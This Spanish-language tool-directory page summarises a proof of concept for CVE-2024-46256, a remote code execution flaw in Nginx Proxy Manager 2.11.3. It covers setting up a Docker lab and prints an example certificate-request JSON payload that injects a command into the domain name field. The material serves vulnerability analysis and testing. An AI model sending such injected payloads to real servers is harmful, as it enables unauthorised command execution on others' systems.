Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-46256 — Herramienta CVE-2024-46256 | Kitploit
Herramientas/GitHubGitHub/kimtangker/cve-2024-46256
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubkimtangker/cve-2024-46256

CVE-2024-46256

Herramienta CVE-2024-46256

Ver Repositorio
8hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Análisis de la vulnerabilidad RCE CVE-2024-46256 en Nginx Proxy Manager

Configuración del entorno

1. Ejecutar el entorno de Nginx Proxy Manager 2.11.3

root@kitploit:~

docker-compose up -d

O puede usar el script automático:

root@kitploit:~

python setup_environment.py

2. Acceso a Nginx Proxy Manager

  • URL: http://localhost:81

  • Realice las pruebas después de completar la configuración inicial.

  • Inicie sesión con la cuenta de administrador predeterminada (correo electrónico: [email protected] / contraseña: changeme)

  • Verifique los permisos de acceso a las funciones relacionadas con la emisión de certificados.

Información de la vulnerabilidad

  • CVE ID: CVE-2024-46256

Descargar herramienta
  • Producto: Nginx Proxy Manager

  • Versión: 2.11.3

  • Tipo de vulnerabilidad: Remote Code Execution (RCE)

  • CVSS: High

  • Código PoC

    El PoC demuestra que un usuario autenticado puede provocar RCE al inyectar plantillas/comandos en el campo de nombre de dominio durante el proceso de solicitud de emisión de certificados (por ejemplo, Let's Encrypt).

    Ejemplo de payload (ejemplo conceptual):

    root@kitploit:~
    {
      "domain_names": ["test.com\"||{command}||\\n test.com\""],
      "meta": {
        "dns_challenge": false,
        "letsencrypt_agree": true,
        "letsencrypt_email": "[email protected]"
      },
      "provider": "letsencrypt"
    }
    

    Entorno de análisis

    • OS: Windows 10

    • Docker: última versión

    • Nginx Proxy Manager: 2.11.3